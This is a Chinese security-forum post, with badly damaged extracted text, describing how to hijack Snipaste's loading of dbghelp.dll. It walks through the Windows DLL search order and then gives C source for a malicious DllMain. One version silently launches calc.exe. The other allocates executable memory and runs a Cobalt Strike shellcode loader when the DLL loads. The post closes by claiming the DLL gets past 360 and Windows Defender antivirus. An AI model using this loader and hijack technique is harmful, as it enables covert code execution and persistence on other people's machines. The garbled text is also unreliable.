[1114] 2020-09-10_SnipasteDLL劫持

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-16
2020-09-10_SnipasteDLL劫持 S n i p a s t e   D L L     C h a B u g   2 0 2 0 - 0 9 - 1 0 D L L   H I J A C K I N G D L L D L L   H i j a c k i n g d l l d l l m s d t c d l l d l l w i n d o w s d l l W i n 1 0 D L L K n o w n D L L s D L L D L L L o a d L i b r a r y ( ) d l l 1 .   2 .   C : W i n d o w s S y s W O W 6 4 3 .   C : W i n d o w s S y s t e m 3 2 4 .   C : W i n d o w s S y s t e m 5 .   6 .   P A T H       D e s k t o p K N O W D L L S D L L S N I P A S T E S n i p a s t e h t t p s : / / z h . s n i p a s t e . c o m / C : U s e r s s 1 y e D e s k t o p H K E Y _ L O C A L _ M A C H I N E S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l S e s s i o n   M a n a g e r K n o w n D L L s
D L L 使 P r o c e s s   M o n i t o r d l l 使 d b g h e l p . d l l D L L
# i n c l u d e   " p c h . h " # i n c l u d e   < w i n d o w s . h > B O O L   A P I E N T R Y   D l l M a i n (   H M O D U L E   h M o d u l e ,                                             D W O R D     u l _ r e a s o n _ f o r _ c a l l ,                                             L P V O I D   l p R e s e r v e d                                         ) {       s w i t c h   ( u l _ r e a s o n _ f o r _ c a l l )     {       c a s e   D L L _ P R O C E S S _ A T T A C H : W i n E x e c ( " c m d   / c   c a l c . e x e " , S W _ H I D E ) ;       c a s e   D L L _ T H R E A D _ A T T A C H :       c a s e   D L L _ T H R E A D _ D E T A C H :       c a s e   D L L _ P R O C E S S _ D E T A C H :               b r e a k ;     }       r e t u r n   T R U E ; } d e m o c m d s n i p a s t e 使
C o b a l t   S t r i k e 6 4 s h e l l c o d e s h e l l c o d e # i n c l u d e   " p c h . h " H A N D L E   h T h r e a d   =   N U L L ; t y p e d e f   v o i d ( _ _ s t d c a l l *   J M P _ S H E L L C O D E ) ( ) ; / *   l e n g t h :   8 9 4   b y t e s   * / u n s i g n e d   c h a r   s h e l l c o d e [ ]   =   " x 0 0 x 0 8 . . . . . . . . . . . " ; D W O R D   W I N A P I   j m p _ s h e l l c o d e ( L P V O I D   p P a r a ) {   L P V O I D   l p B a s e   =   V i r t u a l A l l o c ( N U L L ,   s i z e o f ( s h e l l c o d e ) ,   M E M _ C O M M I T ,   P A G E _ E X E C U T E _ R E A D W R I T E ) ;   m e m c p y ( l p B a s e ,   s h e l l c o d e ,   s i z e o f ( s h e l l c o d e ) ) ;   J M P _ S H E L L C O D E   j m p _ s h e l l c o d e   =   ( J M P _ S H E L L C O D E ) l p B a s e ;   j m p _ s h e l l c o d e ( ) ;   r e t u r n   0 ; } B O O L   A P I E N T R Y   D l l M a i n ( H M O D U L E   h M o d u l e ,                                           D W O R D     u l _ r e a s o n _ f o r _ c a l l ,                                           L P V O I D   l p R e s e r v e d                                         ) {   s w i t c h   ( u l _ r e a s o n _ f o r _ c a l l ) {       c a s e   D L L _ P R O C E S S _ A T T A C H :           h T h r e a d   =   C r e a t e T h r e a d ( N U L L ,   0 ,   j m p _ s h e l l c o d e ,   0 ,   0 ,   0 ) ;       c a s e   D L L _ T H R E A D _ A T T A C H :       c a s e   D L L _ T H R E A D _ D E T A C H :       c a s e   D L L _ P R O C E S S _ D E T A C H :           b r e a k ; }   r e t u r n   T R U E ; } D L L S n i p a s t e
D L L 3 6 0 W i n d o w s   D e f e n d e r 使 便 广

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则